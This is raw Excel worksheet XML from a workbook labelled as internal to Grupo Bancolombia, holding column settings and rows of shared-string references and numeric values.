      </c>
    </row>
    <row r="1130" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1130" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1130" s="52"/>
      <c r="D1130" s="96"/>
      <c r="E1130" s="95" t="s">
        <v>3491</v>
      </c>
      <c r="F1130" s="42"/>
      <c r="H1130" t="s">
        <v>3475</v>
      </c>
      <c r="I1130" t="s">
        <v>2442</v>
      </c>
      <c r="Q1130" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1130" t="s">
        <v>2443</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection sort="0" autoFilter="0" pivotTables="0"/>
  <phoneticPr fontId="10" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawingHF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ABFCF-FD7D-4E66-B3FE-ADD72449810D}">
  <sheetPr codeName="Hoja3"/>
  <dimension ref="A1:W386"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="14.90625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="12" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="35.36328125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="18.6328125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="56" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="6.6328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="60.6328125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="27.90625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="33.36328125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.36328125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="32.36328125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="49.90625" bestFit="1" customWidth="1"/>
    <col min="15" max="17" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="18" max="21" width="9" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="10" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="14.6328125" bestFit="1" customWidth="1"/>
    <col min="24" max="24" width="14.6328125" customWidth="1"/>
    <col min="25" max="25" width="19.90625" bestFit="1" customWidth="1"/>
    <col min="26" max="26" width="19.54296875" bestFit="1" customWidth="1"/>
    <col min="27" max="27" width="14.6328125" customWidth="1"/>
    <col min="28" max="29" width="14.6328125" bestFit="1" customWidth="1"/>
    <col min="30" max="30" width="14.6328125" customWidth="1"/>
    <col min="31" max="31" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="32" max="32" width="14.6328125" customWidth="1"/>
    <col min="33" max="34" width="14.6328125" bestFit="1" customWidth="1"/>
    <col min="35" max="36" width="14.6328125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>1</v>
      </c>
      <c r="B1" t="s">
        <v>51</v>
      </c>
      <c r="C1" t="s">
        <v>52</v>
      </c>
      <c r="D1" t="s">
        <v>53</v>
      </c>
      <c r="E1" t="s">
        <v>54</v>
      </c>
      <c r="F1" t="s">
        <v>55</v>
      </c>
      <c r="G1" t="s">
        <v>56</v>
      </c>
      <c r="H1" t="s">
        <v>57</v>
      </c>
      <c r="I1" t="s">
        <v>58</v>
      </c>
      <c r="J1" t="s">
        <v>59</v>
      </c>
      <c r="K1" t="s">
        <v>8</v>
      </c>
      <c r="L1" t="s">
        <v>60</v>
      </c>
      <c r="M1" t="s">
        <v>61</v>
      </c>
      <c r="N1" t="s">
        <v>62</v>
      </c>
      <c r="O1" t="s">
        <v>63</v>
      </c>
      <c r="P1" t="s">
        <v>64</v>
      </c>
      <c r="Q1" t="s">
        <v>65</v>
      </c>
      <c r="R1" t="s">
        <v>66</v>
      </c>
      <c r="S1" t="s">
        <v>67</v>
      </c>
      <c r="T1" t="s">
        <v>68</v>
      </c>
      <c r="U1" t="s">
        <v>69</v>
      </c>
      <c r="V1" t="s">
        <v>70</v>
      </c>
      <c r="W1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>4</v>
      </c>
      <c r="B2">
        <v>44615.792942893517</v>
      </c>
      <c r="C2" t="s">
        <v>86</v>
      </c>
      <c r="D2">
        <v>1910</v>
      </c>
      <c r="E2" t="s">
        <v>87</v>
      </c>
      <c r="F2">
        <v>135</v>
      </c>
      <c r="G2" t="s">
        <v>88</v>
      </c>
      <c r="H2" t="s">
        <v>89</v>
      </c>
      <c r="I2" t="s">
        <v>75</v>
      </c>
      <c r="J2" t="s">
        <v>76</v>
      </c>
      <c r="K2" t="s">
        <v>15</v>
      </c>
      <c r="L2" t="s">
        <v>77</v>
      </c>
      <c r="M2" t="s">
        <v>90</v>
      </c>
      <c r="N2" t="s">
        <v>91</v>
      </c>
      <c r="O2" t="s">
        <v>92</v>
      </c>
      <c r="P2" t="s">
        <v>93</v>
      </c>
      <c r="Q2" t="s">
        <v>3492</v>
      </c>
      <c r="R2">
        <v>7218059</v>
      </c>
      <c r="S2">
        <v>7597970</v>
      </c>
      <c r="T2">
        <v>7624365</v>
      </c>
      <c r="U2">
        <v>20972492</v>
      </c>
      <c r="V2">
        <v>30546239</v>
      </c>
      <c r="W2" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>4</v>
      </c>
      <c r="B3">
        <v>44117.594781631946</v>
      </c>
      <c r="C3" t="s">
        <v>96</v>
      </c>
      <c r="D3">
        <v>110</v>
      </c>
      <c r="E3" t="s">
        <v>97</v>
      </c>
      <c r="F3">
        <v>100</v>
      </c>
      <c r="G3" t="s">
        <v>98</v>
      </c>
      <c r="H3" t="s">
        <v>89</v>
      </c>
      <c r="I3" t="s">
        <v>75</v>
      </c>
      <c r="J3" t="s">
        <v>76</v>
      </c>
      <c r="K3" t="s">
        <v>15</v>
      </c>
      <c r="L3" t="s">
        <v>77</v>
      </c>
      <c r="M3" t="s">
        <v>90</v>
      </c>
      <c r="N3" t="s">
        <v>91</v>
      </c>
      <c r="Q3" t="s">
        <v>3493</v>
      </c>
      <c r="R3">
        <v>49937577</v>
      </c>
      <c r="S3">
        <v>41672613</v>
      </c>
      <c r="T3">
        <v>3285668</v>
      </c>
      <c r="U3">
        <v>53</v>
      </c>
      <c r="V3">
        <v>22</v>
      </c>
      <c r="W3" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>4</v>
      </c>
      <c r="B4">
        <v>44117.59478162037</v>
      </c>
      <c r="C4" t="s">
        <v>96</v>
      </c>
      <c r="D4">
        <v>110</v>
      </c>
      <c r="E4" t="s">
        <v>108</v>
      </c>
      <c r="F4">
        <v>101</v>
      </c>
      <c r="G4" t="s">
        <v>109</v>
      </c>
      <c r="H4" t="s">
        <v>110</v>
      </c>
      <c r="I4" t="s">
        <v>75</v>
      </c>
      <c r="J4" t="s">
        <v>76</v>
      </c>
      <c r="K4" t="s">
        <v>15</v>
      </c>
      <c r="L4" t="s">
        <v>77</v>
      </c>
      <c r="M4" t="s">
        <v>90</v>
      </c>
      <c r="N4" t="s">
        <v>91</v>
      </c>
      <c r="O4" t="s">
        <v>111</v>
      </c>
      <c r="Q4" t="s">
        <v>3493</v>
      </c>
      <c r="R4">
        <v>4581</v>
      </c>
      <c r="S4">
        <v>3</v>
      </c>
      <c r="W4" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>4</v>
      </c>
      <c r="B5">
        <v>44522.621907337962</v>
      </c>
      <c r="C5" t="s">
        <v>86</v>
      </c>
      <c r="D5">
        <v>1910</v>
      </c>
      <c r="E5" t="s">
        <v>112</v>
      </c>
      <c r="F5">
        <v>112</v>
      </c>
      <c r="G5" t="s">
        <v>113</v>
      </c>
      <c r="H5" t="s">
        <v>114</v>
      </c>
      <c r="I5" t="s">
        <v>75</v>
      </c>
      <c r="J5" t="s">
        <v>76</v>
      </c>
      <c r="K5" t="s">
        <v>15</v>
      </c>
      <c r="L5" t="s">
        <v>77</v>
      </c>
      <c r="M5" t="s">
        <v>90</v>
      </c>
      <c r="N5" t="s">
        <v>91</v>
      </c>
      <c r="Q5" t="s">
        <v>3492</v>
      </c>
      <c r="R5">
        <v>6</v>
      </c>
      <c r="U5">
        <v>6</v>
      </c>
      <c r="V5">
        <v>403</v>
      </c>
      <c r="W5" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>4</v>
      </c>
      <c r="B6">
        <v>44615.792942881948</v>
      </c>
      <c r="C6" t="s">
        <v>86</v>
      </c>
      <c r="D6">
        <v>1910</v>
      </c>
      <c r="E6" t="s">
        <v>118</v>
      </c>
      <c r="F6">
        <v>143</v>
      </c>
      <c r="G6" t="s">
        <v>119</v>
      </c>
      <c r="H6" t="s">
        <v>120</v>
      </c>
      <c r="I6" t="s">
        <v>75</v>
      </c>
      <c r="J6" t="s">
        <v>76</v>
      </c>
      <c r="K6" t="s">
        <v>15</v>
      </c>
      <c r="L6" t="s">
        <v>77</v>
      </c>
      <c r="M6" t="s">
        <v>90</v>
      </c>
      <c r="N6" t="s">
        <v>91</v>
      </c>
      <c r="O6" t="s">
        <v>121</v>
      </c>
      <c r="P6" t="s">
        <v>93</v>
      </c>
      <c r="Q6" t="s">
        <v>3492</v>
      </c>
      <c r="R6">
        <v>9172</v>
      </c>
      <c r="S6">
        <v>2808</v>
      </c>
      <c r="T6">
        <v>2431</v>
      </c>
      <c r="U6">
        <v>485767</v>
      </c>
      <c r="V6">
        <v>722877</v>
      </c>
      <c r="W6" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>4</v>
      </c>
      <c r="B7">
        <v>44522.621907349538</v>
      </c>
      <c r="C7" t="s">
        <v>86</v>
      </c>
      <c r="D7">
        <v>1910</v>
      </c>
      <c r="E7" t="s">
        <v>122</v>
      </c>
      <c r="F7">
        <v>113</v>
      </c>
      <c r="G7" t="s">
        <v>123</v>
      </c>
      <c r="H7" t="s">
        <v>124</v>
      </c>
      <c r="I7" t="s">
        <v>75</v>
      </c>
      <c r="J7" t="s">
        <v>76</v>
      </c>
      <c r="K7" t="s">
        <v>15</v>
      </c>
      <c r="L7" t="s">
        <v>77</v>
      </c>
      <c r="M7" t="s">
        <v>90</v>
      </c>
      <c r="N7" t="s">
        <v>91</v>
      </c>
      <c r="O7" t="s">
        <v>125</v>
      </c>
      <c r="Q7" t="s">
        <v>3492</v>
      </c>
      <c r="R7">
        <v>3106</v>
      </c>
      <c r="S7">
        <v>2898</v>
      </c>
      <c r="T7">
        <v>2524</v>
      </c>
      <c r="U7">
        <v>2234</v>
      </c>
      <c r="V7">
        <v>3563</v>
      </c>
      <c r="W7" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>4</v>
      </c>
      <c r="B8">
        <v>44615.792942905093</v>
      </c>
      <c r="C8" t="s">
        <v>86</v>
      </c>
      <c r="D8">
        <v>1910</v>
      </c>
      <c r="E8" t="s">
        <v>126</v>
      </c>
      <c r="F8">
        <v>114</v>
      </c>
      <c r="G8" t="s">
        <v>127</v>
      </c>
      <c r="H8" t="s">
        <v>128</v>
      </c>
      <c r="I8" t="s">
        <v>75</v>
      </c>
      <c r="J8" t="s">
        <v>76</v>
      </c>
      <c r="K8" t="s">
        <v>15</v>
      </c>
      <c r="L8" t="s">
        <v>77</v>
      </c>
      <c r="M8" t="s">
        <v>90</v>
      </c>
      <c r="N8" t="s">
        <v>91</v>
      </c>
      <c r="O8" t="s">
        <v>92</v>
      </c>
      <c r="P8" t="s">
        <v>93</v>
      </c>
      <c r="Q8" t="s">
        <v>3492</v>
      </c>
      <c r="R8">
        <v>2978</v>
      </c>
      <c r="S8">
        <v>2779</v>
      </c>
      <c r="T8">
        <v>2425</v>
      </c>
      <c r="U8">
        <v>2122</v>
      </c>
      <c r="V8">
        <v>3449</v>
      </c>
      <c r="W8" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>4</v>
      </c>
      <c r="B9">
        <v>44522.621907372682</v>
      </c>
      <c r="C9" t="s">
        <v>86</v>
      </c>
      <c r="D9">
        <v>1910</v>
      </c>
      <c r="E9" t="s">
        <v>129</v>
      </c>
      <c r="F9">
        <v>112</v>
      </c>
      <c r="G9" t="s">
        <v>130</v>
      </c>
      <c r="H9" t="s">
        <v>131</v>
      </c>
      <c r="I9" t="s">
        <v>75</v>
      </c>
      <c r="J9" t="s">
        <v>76</v>
      </c>
      <c r="K9" t="s">
        <v>15</v>
      </c>
      <c r="L9" t="s">
        <v>77</v>
      </c>
      <c r="M9" t="s">
        <v>90</v>
      </c>
      <c r="N9" t="s">
        <v>91</v>
      </c>
      <c r="O9" t="s">
        <v>132</v>
      </c>
      <c r="Q9" t="s">
        <v>3492</v>
      </c>
      <c r="R9">
        <v>2964347</v>
      </c>
      <c r="S9">
        <v>2820676</v>
      </c>
      <c r="T9">
        <v>2716439</v>
      </c>
      <c r="U9">
        <v>2794985</v>
      </c>
      <c r="V9">
        <v>3217680</v>
      </c>
      <c r="W9" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>4</v>
      </c>
      <c r="B10">
        <v>44522.621907280096</v>
      </c>
      <c r="C10" t="s">
        <v>86</v>
      </c>
      <c r="D10">
        <v>1910</v>
      </c>
      <c r="E10" t="s">
        <v>133</v>
      </c>
      <c r="F10">
        <v>122</v>
      </c>
      <c r="G10" t="s">
        <v>134</v>
      </c>
      <c r="H10" t="s">
        <v>135</v>
      </c>
      <c r="I10" t="s">
        <v>75</v>
      </c>
      <c r="J10" t="s">
        <v>76</v>
      </c>
      <c r="K10" t="s">
        <v>15</v>
      </c>
      <c r="L10" t="s">
        <v>77</v>
      </c>
      <c r="M10" t="s">
        <v>90</v>
      </c>
      <c r="N10" t="s">
        <v>91</v>
      </c>
      <c r="O10" t="s">
        <v>136</v>
      </c>
      <c r="Q10" t="s">
        <v>3492</v>
      </c>
      <c r="R10">
        <v>7050</v>
      </c>
      <c r="S10">
        <v>8620</v>
      </c>
      <c r="T10">
        <v>5797</v>
      </c>
      <c r="U10">
        <v>4737</v>
      </c>
      <c r="V10">
        <v>7647</v>
      </c>
      <c r="W10" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="11" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>4</v>
      </c>
      <c r="B11">
        <v>44159.709903078707</v>
      </c>
      <c r="C11" t="s">
        <v>143</v>
      </c>
      <c r="D11">
        <v>100</v>
      </c>
      <c r="E11" t="s">
        <v>144</v>
      </c>
      <c r="F11">
        <v>200</v>
      </c>
      <c r="G11" t="s">
        <v>145</v>
      </c>
      <c r="H11" t="s">
        <v>146</v>
      </c>
      <c r="I11" t="s">
        <v>103</v>
      </c>
      <c r="J11" t="s">
        <v>147</v>
      </c>
      <c r="K11" t="s">
        <v>35</v>
      </c>
      <c r="L11" t="s">
        <v>83</v>
      </c>
      <c r="M11" t="s">
        <v>148</v>
      </c>
      <c r="N11" t="s">
        <v>149</v>
      </c>
      <c r="O11" t="s">
        <v>150</v>
      </c>
      <c r="Q11" t="s">
        <v>151</v>
      </c>
      <c r="S11">
        <v>41</v>
      </c>
      <c r="T11">
        <v>754</v>
      </c>
      <c r="U11">
        <v>12804</v>
      </c>
      <c r="V11">
        <v>65709</v>
      </c>
      <c r="W11" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="12" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>4</v>
      </c>
      <c r="B12">
        <v>44706.679878750001</v>
      </c>
      <c r="C12" t="s">
        <v>152</v>
      </c>
      <c r="D12">
        <v>100</v>
      </c>
      <c r="E12" t="s">
        <v>153</v>
      </c>
      <c r="F12">
        <v>100</v>
      </c>
      <c r="G12" t="s">
        <v>154</v>
      </c>
      <c r="H12" t="s">
        <v>155</v>
      </c>
      <c r="I12" t="s">
        <v>156</v>
      </c>
      <c r="J12" t="s">
        <v>157</v>
      </c>
      <c r="K12" t="s">
        <v>21</v>
      </c>
      <c r="L12" t="s">
        <v>77</v>
      </c>
      <c r="M12" t="s">
        <v>158</v>
      </c>
      <c r="N12" t="s">
        <v>159</v>
      </c>
      <c r="O12" t="s">
        <v>160</v>
      </c>
      <c r="Q12" t="s">
        <v>161</v>
      </c>
      <c r="W12" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="13" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>4</v>
      </c>
      <c r="B13">
        <v>44396.621348773151</v>
      </c>
      <c r="C13" t="s">
        <v>199</v>
      </c>
      <c r="D13">
        <v>101</v>
      </c>
      <c r="E13" t="s">
        <v>200</v>
      </c>
      <c r="F13">
        <v>101</v>
      </c>
      <c r="G13" t="s">
        <v>201</v>
      </c>
      <c r="H13" t="s">
        <v>202</v>
      </c>
      <c r="I13" t="s">
        <v>203</v>
      </c>
      <c r="J13" t="s">
        <v>204</v>
      </c>
      <c r="K13" t="s">
        <v>16</v>
      </c>
      <c r="L13" t="s">
        <v>83</v>
      </c>
      <c r="M13" t="s">
        <v>72</v>
      </c>
      <c r="Q13" t="s">
        <v>161</v>
      </c>
      <c r="W13" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="14" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>4</v>
      </c>
      <c r="B14">
        <v>44622.64242405093</v>
      </c>
      <c r="C14" t="s">
        <v>333</v>
      </c>
      <c r="D14">
        <v>100</v>
      </c>
      <c r="E14" t="s">
        <v>334</v>
      </c>
      <c r="F14">
        <v>100</v>
      </c>
      <c r="G14" t="s">
        <v>335</v>
      </c>
      <c r="H14" t="s">
        <v>336</v>
      </c>
      <c r="I14" t="s">
        <v>75</v>
      </c>
      <c r="J14" t="s">
        <v>76</v>
      </c>
      <c r="K14" t="s">
        <v>15</v>
      </c>
      <c r="L14" t="s">
        <v>77</v>
      </c>
      <c r="M14" t="s">
        <v>90</v>
      </c>
      <c r="N14" t="s">
        <v>91</v>
      </c>
      <c r="Q14" t="s">
        <v>3494</v>
      </c>
      <c r="R14">
        <v>50</v>
      </c>
      <c r="S14">
        <v>36796</v>
      </c>
      <c r="T14">
        <v>35561</v>
      </c>
      <c r="U14">
        <v>27151</v>
      </c>
      <c r="V14">
        <v>46125</v>
      </c>
      <c r="W14" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="15" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>4</v>
      </c>
      <c r="B15">
        <v>44722.466576481478</v>
      </c>
      <c r="C15" t="s">
        <v>333</v>
      </c>
      <c r="D15">
        <v>100</v>
      </c>
      <c r="E15" t="s">
        <v>338</v>
      </c>
      <c r="F15">
        <v>100</v>
      </c>
      <c r="G15" t="s">
        <v>339</v>
      </c>
      <c r="H15" t="s">
        <v>340</v>
      </c>
      <c r="I15" t="s">
        <v>75</v>
      </c>
      <c r="J15" t="s">
        <v>76</v>
      </c>
      <c r="K15" t="s">
        <v>15</v>
      </c>
      <c r="L15" t="s">
        <v>77</v>
      </c>
      <c r="M15" t="s">
        <v>90</v>
      </c>
      <c r="N15" t="s">
        <v>91</v>
      </c>
      <c r="O15" t="s">
        <v>341</v>
      </c>
      <c r="Q15" t="s">
        <v>3494</v>
      </c>
      <c r="U15">
        <v>17</v>
      </c>
      <c r="V15">
        <v>6</v>
      </c>
      <c r="W15" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="16" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>4</v>
      </c>
      <c r="B16">
        <v>44447.490985370372</v>
      </c>
      <c r="C16" t="s">
        <v>342</v>
      </c>
      <c r="D16">
        <v>160</v>
      </c>
      <c r="E16" t="s">
        <v>343</v>
      </c>
      <c r="F16">
        <v>120</v>
      </c>
      <c r="G16" t="s">
        <v>344</v>
      </c>
      <c r="H16" t="s">
        <v>345</v>
      </c>
      <c r="I16" t="s">
        <v>75</v>
      </c>
      <c r="J16" t="s">
        <v>236</v>
      </c>
      <c r="K16" t="s">
        <v>21</v>
      </c>
      <c r="L16" t="s">
        <v>77</v>
      </c>
      <c r="M16" t="s">
        <v>237</v>
      </c>
      <c r="N16" t="s">
        <v>238</v>
      </c>
      <c r="Q16" t="s">
        <v>3495</v>
      </c>
      <c r="R16">
        <v>1803</v>
      </c>
      <c r="S16">
        <v>2137</v>
      </c>
      <c r="T16">
        <v>2203</v>
      </c>
      <c r="U16">
        <v>1251</v>
      </c>
      <c r="V16">
        <v>165</v>
      </c>
      <c r="W16" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="17" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>4</v>
      </c>
      <c r="B17">
        <v>44511.693646087966</v>
      </c>
      <c r="C17" t="s">
        <v>342</v>
      </c>
      <c r="D17">
        <v>160</v>
      </c>
      <c r="E17" t="s">
        <v>347</v>
      </c>
      <c r="F17">
        <v>100</v>
      </c>
      <c r="G17" t="s">
        <v>348</v>
      </c>
      <c r="H17" t="s">
        <v>349</v>
      </c>
      <c r="I17" t="s">
        <v>75</v>
      </c>
      <c r="J17" t="s">
        <v>236</v>
      </c>
      <c r="K17" t="s">
        <v>21</v>
      </c>
      <c r="L17" t="s">
        <v>77</v>
      </c>
      <c r="M17" t="s">
        <v>237</v>
      </c>
      <c r="N17" t="s">
        <v>238</v>
      </c>
      <c r="O17" t="s">
        <v>350</v>
      </c>
      <c r="Q17" t="s">
        <v>3495</v>
      </c>
      <c r="R17">
        <v>109</v>
      </c>
      <c r="U17">
        <v>10</v>
      </c>
      <c r="V17">
        <v>21</v>
      </c>
      <c r="W17" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="18" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>4</v>
      </c>
      <c r="B18">
        <v>44503.827030671295</v>
      </c>
      <c r="C18" t="s">
        <v>342</v>
      </c>
      <c r="D18">
        <v>160</v>
      </c>
      <c r="E18" t="s">
        <v>351</v>
      </c>
      <c r="F18">
        <v>110</v>
      </c>
      <c r="G18" t="s">
        <v>352</v>
      </c>
      <c r="H18" t="s">
        <v>353</v>
      </c>
      <c r="I18" t="s">
        <v>75</v>
      </c>
      <c r="J18" t="s">
        <v>236</v>
      </c>
      <c r="K18" t="s">
        <v>21</v>
      </c>
      <c r="L18" t="s">
        <v>77</v>
      </c>
      <c r="M18" t="s">
        <v>237</v>
      </c>
      <c r="N18" t="s">
        <v>238</v>
      </c>
      <c r="Q18" t="s">
        <v>3495</v>
      </c>
      <c r="R18">
        <v>2</v>
      </c>
      <c r="U18">
        <v>24</v>
      </c>
      <c r="V18">
        <v>2</v>
      </c>
      <c r="W18" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="19" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>4</v>
      </c>
      <c r="B19">
        <v>44503.827030682871</v>
      </c>
      <c r="C19" t="s">
        <v>342</v>
      </c>
      <c r="D19">
        <v>160</v>
      </c>
      <c r="E19" t="s">
        <v>354</v>
      </c>
      <c r="F19">
        <v>101</v>
      </c>
      <c r="G19" t="s">
        <v>355</v>
      </c>
      <c r="H19" t="s">
        <v>356</v>
      </c>
      <c r="I19" t="s">
        <v>75</v>
      </c>
      <c r="J19" t="s">
        <v>236</v>
      </c>
      <c r="K19" t="s">
        <v>21</v>
      </c>
      <c r="L19" t="s">
        <v>77</v>
      </c>
      <c r="M19" t="s">
        <v>237</v>
      </c>
      <c r="N19" t="s">
        <v>238</v>
      </c>
      <c r="Q19" t="s">
        <v>3495</v>
      </c>
      <c r="R19">
        <v>225</v>
      </c>
      <c r="S19">
        <v>474</v>
      </c>
      <c r="T19">
        <v>387</v>
      </c>
      <c r="U19">
        <v>253</v>
      </c>
      <c r="V19">
        <v>236</v>
      </c>
      <c r="W19" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="20" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>4</v>
      </c>
      <c r="B20">
        <v>44161.580590034719</v>
      </c>
      <c r="C20" t="s">
        <v>357</v>
      </c>
      <c r="D20">
        <v>100</v>
      </c>
      <c r="E20" t="s">
        <v>358</v>
      </c>
      <c r="F20">
        <v>100</v>
      </c>
      <c r="G20" t="s">
        <v>359</v>
      </c>
      <c r="H20" t="s">
        <v>360</v>
      </c>
      <c r="I20" t="s">
        <v>75</v>
      </c>
      <c r="J20" t="s">
        <v>76</v>
      </c>
      <c r="K20" t="s">
        <v>21</v>
      </c>
      <c r="L20" t="s">
        <v>77</v>
      </c>
      <c r="M20" t="s">
        <v>237</v>
      </c>
      <c r="N20" t="s">
        <v>238</v>
      </c>
      <c r="O20" t="s">
        <v>361</v>
      </c>
      <c r="Q20" t="s">
        <v>161</v>
      </c>
      <c r="W20" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="21" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A21" t="s">
        <v>4</v>
      </c>
      <c r="B21">
        <v>43971.455569467595</v>
      </c>
      <c r="C21" t="s">
        <v>362</v>
      </c>
      <c r="D21">
        <v>100</v>
      </c>
      <c r="E21" t="s">
        <v>363</v>
      </c>
      <c r="F21">
        <v>100</v>
      </c>
      <c r="G21" t="s">
        <v>364</v>
      </c>
      <c r="H21" t="s">
        <v>365</v>
      </c>
      <c r="I21" t="s">
        <v>75</v>
      </c>
      <c r="J21" t="s">
        <v>236</v>
      </c>
      <c r="K21" t="s">
        <v>21</v>
      </c>
      <c r="L21" t="s">
        <v>77</v>
      </c>
      <c r="M21" t="s">
        <v>237</v>
      </c>
      <c r="N21" t="s">
        <v>238</v>
      </c>
      <c r="O21" t="s">
        <v>111</v>
      </c>
      <c r="Q21" t="s">
        <v>3496</v>
      </c>
      <c r="R21">
        <v>363508</v>
      </c>
      <c r="S21">
        <v>451080</v>
      </c>
      <c r="T21">
        <v>548944</v>
      </c>
      <c r="U21">
        <v>268199</v>
      </c>
      <c r="V21">
        <v>301837</v>
      </c>
      <c r="W21" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="22" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A22" t="s">
        <v>4</v>
      </c>
      <c r="B22">
        <v>44405.482558391202</v>
      </c>
      <c r="C22" t="s">
        <v>367</v>
      </c>
      <c r="D22">
        <v>111</v>
      </c>
      <c r="E22" t="s">
        <v>368</v>
      </c>
      <c r="F22">
        <v>100</v>
      </c>
      <c r="G22" t="s">
        <v>369</v>
      </c>
      <c r="H22" t="s">
        <v>370</v>
      </c>
      <c r="I22" t="s">
        <v>75</v>
      </c>
      <c r="J22" t="s">
        <v>236</v>
      </c>
      <c r="K22" t="s">
        <v>21</v>
      </c>
      <c r="L22" t="s">
        <v>77</v>
      </c>
      <c r="M22" t="s">
        <v>236</v>
      </c>
      <c r="O22" t="s">
        <v>371</v>
      </c>
      <c r="Q22" t="s">
        <v>3497</v>
      </c>
      <c r="R22">
        <v>15090</v>
      </c>
      <c r="S22">
        <v>13819</v>
      </c>
      <c r="T22">
        <v>12767</v>
      </c>
      <c r="U22">
        <v>13183</v>
      </c>
      <c r="V22">
        <v>13692</v>
      </c>
      <c r="W22" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="23" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A23" t="s">
        <v>4</v>
      </c>
      <c r="B23">
        <v>44510.617340069446</v>
      </c>
      <c r="C23" t="s">
        <v>367</v>
      </c>
      <c r="D23">
        <v>111</v>
      </c>
      <c r="E23" t="s">
        <v>373</v>
      </c>
      <c r="F23">
        <v>101</v>
      </c>
      <c r="G23" t="s">
        <v>374</v>
      </c>
      <c r="H23" t="s">
        <v>375</v>
      </c>
      <c r="I23" t="s">
        <v>75</v>
      </c>
      <c r="J23" t="s">
        <v>236</v>
      </c>
      <c r="K23" t="s">
        <v>21</v>
      </c>
      <c r="L23" t="s">
        <v>77</v>
      </c>
      <c r="M23" t="s">
        <v>236</v>
      </c>
      <c r="Q23" t="s">
        <v>3497</v>
      </c>
      <c r="R23">
        <v>1246</v>
      </c>
      <c r="S23">
        <v>3347</v>
      </c>
      <c r="T23">
        <v>6518</v>
      </c>
      <c r="U23">
        <v>5956</v>
      </c>
      <c r="V23">
        <v>10336</v>
      </c>
      <c r="W23" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="24" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A24" t="s">
        <v>4</v>
      </c>
      <c r="B24">
        <v>44579.824702824073</v>
      </c>
      <c r="C24" t="s">
        <v>376</v>
      </c>
      <c r="D24">
        <v>132</v>
      </c>
